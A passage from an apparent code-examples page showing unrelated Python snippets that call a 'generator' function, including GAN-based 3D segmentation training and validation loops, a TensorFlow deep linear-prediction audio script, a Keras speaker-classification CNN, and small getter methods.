    # `run_smooth_loss`, raising NameError on the first batch.
    run_smooth_loss = 0
    run_div_loss = 0
    run_segmentation_loss = 0
    run_dice_gt = np.zeros(6)
    run_dice_pd = np.zeros(6)

    start_time = time()

    for step, (x, y, x_1, x_2, y_1, y_2, s, k_1, k_2, inter_subject,
               intra_subject) in enumerate(loader):
        # Load training example to device.
        x, y, k_1, k_2 = x.to(device), y.to(device), k_1.to(device), k_2.to(
            device)
        y_1, y_2 = y_1.to(device), y_2.to(device)
        s, inter_subject, intra_subject = s.to(device), inter_subject.to(
            device), intra_subject.to(device)

        # ---- Train discriminator on the real label pair ----
        optimizer_d.zero_grad()

        pred = discriminator(y_1, y_2)
        dis_loss = dis_criterion(pred, s)

        dis_loss.backward()
        optimizer_d.step()

        run_dis_loss += dis_loss.item()

        # ---- Train generator and segmentator jointly ----
        optimizer_gs.zero_grad()
        # Generate deformed image (forward/backward deformation fields).
        _f_1_f, _f_1_b = generator(x, k_1)
        f_1_f, f_1_b = scale_factor * _f_1_f, scale_factor * _f_1_b
        z_1 = warper(x, f_1_f)
        # NOTE(review): y_1/y_2 loaded from the batch are overwritten here by
        # warped labels — confirm this shadowing is intentional.
        y_1 = warper(y, f_1_f)

        _f_2_f, _f_2_b = generator(x, k_2)
        f_2_f, f_2_b = scale_factor * _f_2_f, scale_factor * _f_2_b
        z_2 = warper(x, f_2_f)
        y_2 = warper(y, f_2_f)

        # Reconstruct image via the backward fields.
        x_r_1 = warper(z_1, f_1_b)
        x_r_2 = warper(z_2, f_2_b)

        y_r_1 = warper(y_1, f_1_b)
        y_r_2 = warper(y_2, f_2_b)

        # Segmentation on the deformed images, warped back to source space.
        hat_y_d_1 = segmentator(z_1)
        hat_y_d_2 = segmentator(z_2)
        hat_y_1 = warper(hat_y_d_1, f_1_b)
        hat_y_2 = warper(hat_y_d_2, f_2_b)

        # Discriminator prediction on (predicted segmentation, real label).
        pred = discriminator(hat_y_1, y)

        # compute loss
        # Invertibility loss: reconstruction SSIM + reconstruction dice.
        res_1 = -ssim_criterion(x_r_1, x)
        res_2 = -ssim_criterion(x_r_2, x)
        reconstruction_ssim_loss = 1 / 2 * (res_1 + res_2)
        dice_1 = dice_criterion(y_r_1, y)
        dice_2 = dice_criterion(y_r_2, y)
        reconstruction_dice_loss = 1 / 2 * (dice_1 + dice_2)
        inv_loss = 1 / 2 * (reconstruction_ssim_loss +
                            reconstruction_dice_loss)

        # Diversity loss between the two deformations of the same subject.
        distortion_loss = ssim_criterion(z_1, z_2)
        distortion_dice_loss = -dice_criterion(y_1, y_2)
        div_loss = 1 / 2 * (distortion_loss + distortion_dice_loss)

        # Smoothness of all four deformation fields (unscaled).
        smooth_1 = smooth_criterion(_f_1_f)
        smooth_2 = smooth_criterion(_f_2_f)
        smooth_3 = smooth_criterion(_f_1_b)
        smooth_4 = smooth_criterion(_f_2_b)
        smooth = 0.25 * (smooth_1 + smooth_2 + smooth_3 + smooth_4)

        # Segmentation (focal) loss.
        seg_loss_1 = focal_criterion(hat_y_1, y)
        seg_loss_2 = focal_criterion(hat_y_2, y)
        segmentation_loss = 1 / 2 * (seg_loss_1 + seg_loss_2)

        # Adversarial loss: fool the discriminator into "inter subject".
        adv_loss = dis_criterion(pred, inter_subject)

        total_loss =  segmentation_loss + lambda_1 * adv_loss\
           + lambda_2 * inv_loss + lambda_3 * smooth + lambda_4 * div_loss

        total_loss.backward()
        optimizer_gs.step()

        # compute reconstructed ground truth dice score
        dice_score_gt_1 = compute_dice_score(y_r_1, y, device)
        dice_score_gt_2 = compute_dice_score(y_r_2, y, device)
        dice_score_gt = 0.5 * (dice_score_gt_1 + dice_score_gt_2)
        run_dice_gt += dice_score_gt
        # compute reconstructed predicted segmap dice score
        dice_score_pd_1 = compute_dice_score(hat_y_1, y, device)
        dice_score_pd_2 = compute_dice_score(hat_y_2, y, device)
        dice_score_pd = 0.5 * (dice_score_pd_1 + dice_score_pd_2)
        run_dice_pd += dice_score_pd

        # Accumulate loss values
        run_adv_loss += adv_loss.item()
        run_inv_loss += inv_loss.item()
        run_smooth_loss += smooth.item()
        run_div_loss += div_loss.item()
        run_segmentation_loss += segmentation_loss.item()

    dur = time() - start_time

    # Repack components for the caller.
    models = {'gen': generator, 'seg': segmentator, 'dis': discriminator}
    optimizer = {'gs': optimizer_gs, 'd': optimizer_d}

    # NOTE(review): if `loader` yields no batches, `step` is undefined here.
    avg_dis_loss = run_dis_loss / (step + 1)
    avg_inv_loss = run_inv_loss / (step + 1)
    avg_div_loss = run_div_loss / (step + 1)
    avg_smooth_loss = run_smooth_loss / (step + 1)
    avg_adv_loss = run_adv_loss / (step + 1)
    avg_segmentation_loss = run_segmentation_loss / (step + 1)
    avg_dice_gt = run_dice_gt / (step + 1)
    avg_dice_pd = run_dice_pd / (step + 1)

    # Print log
    print('invertibility_loss:      {:.4f} -- diversity_loss:     {:.4f}'\
      .format(avg_inv_loss, avg_div_loss))
    print('reconstruction_dice_score:{:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_gt[0],avg_dice_gt[1],avg_dice_gt[2],avg_dice_gt[3],avg_dice_gt[4],avg_dice_gt[5]))
    print('segmentation_loss:        {:.4f}'\
      .format(avg_segmentation_loss))
    print('Segmentation_dice_score:  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_pd[0],avg_dice_pd[1],avg_dice_pd[2],avg_dice_pd[3],avg_dice_pd[4],avg_dice_pd[5]))
    # BUG FIX: printed the undefined name `avg_smooth`; use avg_smooth_loss.
    print('smooth:                   {:.4f}'.format(avg_smooth_loss))
    print('discriminator:                   {:.4f}'.format(avg_dis_loss))
    print('adversarial  :                   {:.4f}'.format(avg_adv_loss))
    print('duration:{:.0f}'.format(dur))

    return models, optimizer
Example #32
0
def val_epoch(models, loader, batch_size, device, scale_factor=0.25):
    """Run one validation pass and print averaged losses and dice scores.

    Mirrors train_epoch's forward computation under torch.no_grad(); no
    optimizer steps are taken.

    Args:
        models: dict with 'seg', 'gen', 'dis' torch modules.
        loader: iterable yielding the same tuples as in train_epoch.
        batch_size: unused here; kept for interface compatibility.
        device: torch device the batch tensors are moved to.
        scale_factor: scaling applied to the predicted deformation fields.
    """
    warper = Warper(device)
    # NOTE(review): modules are left in .train() mode during validation, so
    # dropout/batch-norm behave as in training — confirm this is intentional.
    segmentator = models['seg'].train()
    generator = models['gen'].train()
    discriminator = models['dis'].train()

    dis_criterion = torch.nn.CrossEntropyLoss()
    ssim_criterion = pytorch_ssim.SSIM3D(window_size=11)
    classes_weights = [1 / 33, 1 / 33, 1 / 33, 10 / 33, 10 / 33, 10 / 33]
    dice_criterion = Dice_Loss()
    smooth_criterion = Gradient_Loss()
    focal_criterion = Focal_Loss(0.7, 0.3, 4 / 3, weights=classes_weights)

    run_dis_loss = 0
    run_adv_loss = 0
    run_inv_loss = 0
    # BUG FIX: was initialised as `run_smooth` but accumulated below as
    # `run_smooth_loss`, raising NameError on the first batch.
    run_smooth_loss = 0
    run_div_loss = 0
    run_segmentation_loss = 0
    run_dice_gt = np.zeros(6)
    run_dice_pd = np.zeros(6)

    start_time = time()
    with torch.no_grad():
        for step, (x, y, x_1, x_2, y_1, y_2, s, k_1, k_2, inter_subject,
                   intra_subject) in enumerate(loader):
            # Load validation example to device.
            x, y, k_1, k_2 = x.to(device), y.to(device), k_1.to(
                device), k_2.to(device)
            y_1, y_2 = y_1.to(device), y_2.to(device)
            s, inter_subject, intra_subject = s.to(device), inter_subject.to(
                device), intra_subject.to(device)

            # Discriminator loss on the real label pair.
            pred = discriminator(y_1, y_2)
            dis_loss = dis_criterion(pred, s)
            run_dis_loss += dis_loss.item()

            # Generate deformed images (forward/backward fields).
            _f_1_f, _f_1_b = generator(x, k_1)
            f_1_f, f_1_b = scale_factor * _f_1_f, scale_factor * _f_1_b
            z_1 = warper(x, f_1_f)
            y_1 = warper(y, f_1_f)

            _f_2_f, _f_2_b = generator(x, k_2)
            f_2_f, f_2_b = scale_factor * _f_2_f, scale_factor * _f_2_b
            z_2 = warper(x, f_2_f)
            y_2 = warper(y, f_2_f)

            # Reconstruct image via the backward fields.
            x_r_1 = warper(z_1, f_1_b)
            x_r_2 = warper(z_2, f_2_b)

            y_r_1 = warper(y_1, f_1_b)
            y_r_2 = warper(y_2, f_2_b)

            # Segmentation on the deformed images, warped back.
            hat_y_d_1 = segmentator(z_1)
            hat_y_d_2 = segmentator(z_2)
            hat_y_1 = warper(hat_y_d_1, f_1_b)
            hat_y_2 = warper(hat_y_d_2, f_2_b)

            pred = discriminator(hat_y_1, y)

            # Invertibility loss: reconstruction SSIM + reconstruction dice.
            res_1 = -ssim_criterion(x_r_1, x)
            res_2 = -ssim_criterion(x_r_2, x)
            reconstruction_ssim_loss = 1 / 2 * (res_1 + res_2)
            dice_1 = dice_criterion(y_r_1, y)
            dice_2 = dice_criterion(y_r_2, y)
            reconstruction_dice_loss = 1 / 2 * (dice_1 + dice_2)
            inv_loss = 1 / 2 * (reconstruction_ssim_loss +
                                reconstruction_dice_loss)

            # Diversity loss between the two deformations.
            distortion_loss = ssim_criterion(z_1, z_2)
            distortion_dice_loss = -dice_criterion(y_1, y_2)
            div_loss = 1 / 2 * (distortion_loss + distortion_dice_loss)

            # Smoothness of all four deformation fields (unscaled).
            smooth_1 = smooth_criterion(_f_1_f)
            smooth_2 = smooth_criterion(_f_2_f)
            smooth_3 = smooth_criterion(_f_1_b)
            smooth_4 = smooth_criterion(_f_2_b)
            smooth = 0.25 * (smooth_1 + smooth_2 + smooth_3 + smooth_4)

            # Segmentation (focal) loss.
            seg_loss_1 = focal_criterion(hat_y_1, y)
            seg_loss_2 = focal_criterion(hat_y_2, y)
            segmentation_loss = 0.5 * (seg_loss_1 + seg_loss_2)

            adv_loss = dis_criterion(pred, inter_subject)

            # compute reconstructed ground truth dice score
            dice_score_gt_1 = compute_dice_score(y_r_1, y, device)
            dice_score_gt_2 = compute_dice_score(y_r_2, y, device)
            dice_score_gt = 0.5 * (dice_score_gt_1 + dice_score_gt_2)
            run_dice_gt += dice_score_gt
            # compute reconstructed predicted segmap dice score
            dice_score_pd_1 = compute_dice_score(hat_y_1, y, device)
            dice_score_pd_2 = compute_dice_score(hat_y_2, y, device)
            dice_score_pd = 0.5 * (dice_score_pd_1 + dice_score_pd_2)
            run_dice_pd += dice_score_pd

            run_adv_loss += adv_loss.item()
            run_inv_loss += inv_loss.item()
            run_smooth_loss += smooth.item()
            run_div_loss += div_loss.item()
            run_segmentation_loss += segmentation_loss.item()

    dur = time() - start_time

    # NOTE(review): if `loader` yields no batches, `step` is undefined here.
    avg_dis_loss = run_dis_loss / (step + 1)
    avg_inv_loss = run_inv_loss / (step + 1)
    avg_div_loss = run_div_loss / (step + 1)
    avg_smooth_loss = run_smooth_loss / (step + 1)
    avg_adv_loss = run_adv_loss / (step + 1)
    avg_segmentation_loss = run_segmentation_loss / (step + 1)
    avg_dice_gt = run_dice_gt / (step + 1)
    avg_dice_pd = run_dice_pd / (step + 1)

    # Print log
    print('invertibility_loss:      {:.4f} -- diversity_loss:     {:.4f}'\
      .format(avg_inv_loss, avg_div_loss))
    print('reconstruction_dice_score:{:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_gt[0],avg_dice_gt[1],avg_dice_gt[2],avg_dice_gt[3],avg_dice_gt[4],avg_dice_gt[5]))
    print('segmentation_loss:        {:.4f}'\
      .format(avg_segmentation_loss))
    print('Segmentation_dice_score:  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_pd[0],avg_dice_pd[1],avg_dice_pd[2],avg_dice_pd[3],avg_dice_pd[4],avg_dice_pd[5]))
    # BUG FIX: printed the undefined name `avg_smooth`; use avg_smooth_loss.
    print('smooth:                   {:.4f}'.format(avg_smooth_loss))
    print('discriminator:                   {:.4f}'.format(avg_dis_loss))
    print('adversarial  :                   {:.4f}'.format(avg_adv_loss))
    print('duration:{:.0f}'.format(dur))

    return
Example #33
0
 def getter(self):
     """Build and return the generator for this record's owner."""
     owner_id = self.data['owner_id']
     owner_type = self.data['owner_type']
     return generator(owner_id, owner_type)
Example #34
0
def main(_):
    """Train a deep linear-prediction coefficient model on batched wav data.

    Builds a TF1 shuffle-batch input pipeline over FLAGS.e2e_dataset, runs an
    AE generator G over Hankel-structured past-sample frames, fits LPC-style
    prediction coefficients against classic LPC (lpc2), periodically saves
    trainable variables, and plots residuals and spectral envelopes at test
    time.
    """
    file_queue = tf.train.string_input_producer([FLAGS.e2e_dataset])
    get_wav = read_and_decode(file_queue, FLAGS.canvas_size)
    wavbatch = tf.train.shuffle_batch([get_wav],
                                      batch_size=FLAGS.batch_size,
                                      num_threads=2,
                                      capacity=1000 + 3 * FLAGS.batch_size,
                                      min_after_dequeue=1000,
                                      name='wav_and_noisy')
    lambdaG = 100
    lambdaprediction = 1
    savefile = 'DeepLPcoeff.npz'
    learning_rate = 0.00001  # 0.0001

    deltamaxstep = 50
    maxstep = 5000  # 10000
    test_epochs = 100

    training_epochs = 10  # 5000
    display_step = int(maxstep / 10)  # 500
    # Prediction order. (A dead `p = 8` immediately overwritten by 18 was
    # removed; 18 was the effective value.)
    p = 18

    rng = np.random

    # Pad the frame so the Hankel matrix and target align.
    FLAGS.canvas_size = FLAGS.canvas_size + p

    # tf Graph inputs: Hankel past-sample matrix X and next-sample target Y.
    X = tf.placeholder(tf.float32, [FLAGS.canvas_size, p])
    Y = tf.placeholder(tf.float32, [FLAGS.canvas_size, 1])

    class param:
        """Minimal config object consumed by AEGenerator."""

        def __init__(self):
            self.g_enc_depths = ''  # generator encoder depths
            self.d_num_fmaps = ''  # discriminator feature-map sizes
            self.bias_downconv = False
            self.deconv_type = 'deconv'
            self.bias_deconv = False

    aparam = param()

    aparam.g_enc_depths = [
        16
    ]  # , 32]#, 32, 64]#, 64, 128, 128, 256, 256, 512, 1024]

    generator = AEGenerator(aparam)

    G = generator(X, is_ref=False, z_on=False)

    G = tf.squeeze(G)

    # LP coefficients fed per-batch (computed from classic LPC below).
    W = tf.placeholder(tf.float32, [p, 1])

    # Prediction: next sample from the generator-transformed past samples.
    y_pred = tf.matmul(G, W)  # what if i use lpca for w initialization

    # Loss and optimizer: minimize the mean squared prediction error.
    cost = tf.reduce_mean(tf.pow(Y - y_pred, 2))

    optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)

    with tf.Session() as sess:
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)

        sess.run(tf.global_variables_initializer())

        # must load AFTER the initializer
        state = load_trainable_vars(sess, savefile)

        log = str(state.get('log', ''))

        step = 1

        training_cost = 0

        try:
            while not coord.should_stop():
                inputdata = sess.run([wavbatch])
                inputdata = np.squeeze(inputdata)

                # Hankel matrix of zero-padded past samples (one row per
                # prediction target).
                train_X = np.asarray(
                    hankel(np.append(np.zeros(p), inputdata), np.zeros(
                        (p, 1))))

                train_Y = np.asarray([np.append(inputdata, np.zeros((p, 1)))])

                # Classic LPC coefficients, reversed to match the Hankel
                # column order, fed as the fixed W.
                a, _, _ = lpc2(inputdata, p)
                b = -a[1:]
                lpca = np.asarray([b[::-1]]).T

                train_Y = train_Y.T

                for epoch in range(training_epochs):
                    sess.run(optimizer,
                             feed_dict={
                                 X: train_X,
                                 Y: train_Y,
                                 W: lpca
                             })

                training_cost += sess.run(cost,
                                          feed_dict={
                                              X: train_X,
                                              Y: train_Y,
                                              W: lpca
                                          })

                # Running average cost in dB.
                averagecost = 10 * np.log10(training_cost / step)

                if step % display_step == 0:
                    print("step ", step, "Training cost=", averagecost, '\n')

                step += 1

                # Checkpoint + diagnostic plots every `maxstep` steps.
                if step >= maxstep:
                    log = log + '\n cost={nmse:.6f} dB in {i} iterations'.format(
                        nmse=averagecost, i=step)

                    state['log'] = log

                    save_trainable_vars(sess, savefile, **state)

                    maxstep = maxstep + deltamaxstep

                    for i in range(test_epochs):
                        # BUG FIX: original fetched an undefined `noisybatch`
                        # tensor alongside wavbatch (NameError); only the wav
                        # batch exists in this graph.
                        inputdata = sess.run([wavbatch])
                        inputdata = np.squeeze(inputdata)
                        xt = inputdata
                        num_sample = len(xt)

                        def nextpow2(x):
                            return np.ceil(np.log2(x))

                        # Zero-padding factor for the FFT resolution.
                        zpf = 3
                        Nfft = int(2**nextpow2(num_sample * zpf))

                        Org_XW = sp.fft(xt, Nfft)

                        test_X = np.asarray(
                            hankel(np.append(np.zeros(p), inputdata),
                                   np.zeros((p, 1))))

                        test_Y = np.asarray(
                            [np.append(inputdata, np.zeros((p, 1)))])

                        a, _, _ = lpc2(inputdata, p)
                        b = -a[1:]
                        lpca = np.asarray([b[::-1]]).T

                        test_Y = test_Y.T
                        test_G = sess.run(G, feed_dict={X: test_X})

                        # Least-squares deep-LP coefficients via the
                        # pseudo-inverse of the generator output.
                        invX = np.linalg.pinv(test_G)

                        myW = np.dot(invX, test_Y)

                        my_est = np.dot(test_G, myW)

                        my_est = my_est[0:-p]

                        # Residual comparison: deep LP vs classic LPC.
                        plt.figure(1)
                        plt.subplot(221)
                        plt.plot(test_Y[0:-p], label='Original data')
                        plt.plot(test_Y[0:-p] - my_est,
                                 'r',
                                 label='my residue line')
                        plt.plot(test_Y[0:-p] - np.matmul(test_X[0:-p], lpca),
                                 'b--',
                                 label='LP residue line')
                        plt.legend()
                        print(
                            "LPC error is ",
                            np.mean(
                                np.square(test_Y[0:-p] -
                                          np.matmul(test_X[0:-p], lpca))))
                        print("my error is",
                              np.mean(np.square(test_Y[0:-p] - my_est)))

                        plt.subplot(222)
                        plt.plot(lpca, 'r--', label='LP coef')
                        plt.plot(myW, 'b', label='deep LP coef')
                        plt.legend()

                        # Spectral envelopes of both coefficient sets.
                        Fs = 16000
                        myDLPcoef = np.append(1, -myW[::-1])

                        w0, Org_h0 = sig.freqz(1, myDLPcoef, Nfft, whole=True)
                        Org_F0 = Fs * w0 / (2 * np.pi)
                        Org_LP_coef = a
                        w, Org_h = sig.freqz(1, Org_LP_coef, Nfft, whole=True)
                        Org_F = Fs * w / (2 * np.pi)

                        Org_mag = abs(Org_XW)

                        Org_mag = 20 * np.log10(Org_mag)

                        f = np.asarray(range(Nfft)).astype(
                            np.float32) * Fs / Nfft

                        plt.subplot(212)
                        plt.plot(f, Org_mag, 'k-', label='signal')

                        plt.plot(Org_F,
                                 20 * np.log10(abs(Org_h)),
                                 'b--',
                                 label='lpc')
                        plt.plot(Org_F0,
                                 20 * np.log10(abs(Org_h0)),
                                 label='mylpc')

                        plt.xlim((0, Fs / 2))
                        plt.legend()

                        filtercoeff = np.append(0, -Org_LP_coef[1:])
                        est_x = sig.lfilter(filtercoeff, 1,
                                            xt)  # Estimated signal
                        e = xt - est_x

                        plt.show()
                        plt.close('all')

        # BUG FIX: the IOError handler was listed after the broad
        # `except Exception` handler and was therefore unreachable; it also
        # called coord.should_stop() (a status query with no effect) where
        # coord.request_stop() was intended. Narrow handler first, and both
        # now request a clean queue shutdown.
        except IOError as e:
            print(e)
            coord.request_stop()
        except Exception as e:
            print(e)
            coord.request_stop()

        coord.request_stop()

        coord.join(threads)
Example #35
0
 def getter(self):
     """Return a generator built from this record's father id and type."""
     data = self.data
     return generator(data["father_id"], data["father_type"])
#print mel_spec_train.shape
#print labels_train.shape

# Build the speaker-classification CNN sized for the mel-spectrogram input.
model1 = create_cnn_model(nb_speaker=nb_speaker,
                          height_input=height_input,
                          width_input=width_input)
model1.summary()

# SGD with Nesterov momentum; categorical cross-entropy matches one-hot
# speaker labels.
sgd = optimizers.SGD(lr=0.001, momentum=0.9, nesterov=True)
model1.compile(optimizer=sgd,
               loss='categorical_crossentropy',
               metrics=['accuracy'])

# With validation data
# NOTE(review): presumably `generator(...)` yields (batch, labels) tuples as
# fit_generator expects — confirm against its definition.
history = model1.fit_generator(generator=generator(mel_spec_train,
                                                   labels_train,
                                                   samples_per_speaker,
                                                   nb_speaker, batch_size),
                               steps_per_epoch=steps_per_epoch,
                               epochs=epochs,
                               verbose=1,
                               validation_data=(mel_spec_test, labels_test))
# Final held-out evaluation (loss, accuracy).
model1.evaluate(mel_spec_test, labels_test)

#history = model1.fit(x = mel_spec_train, y = labels_train, batch_size = batch_size, epochs = epochs, verbose = 1)
"""
ROOTPATH = '/services/scratch/perception/cdamhieu/weights/'
checkpointer = ModelCheckpoint(filepath=ROOTPATH+"VGG16_"+PB_FLAG+"_"+idOar+"_weights.hdf5",
                                       monitor='loss',
                                       verbose=1,
                                       save_weights_only=True,
                                       save_best_only=True,
Example #37
0
 def getter(self):
     # Delegate to the module-level generator with this record's env fields.
     env_id, env_type = self.data["env_id"], self.data["env_type"]
     return generator(env_id, env_type)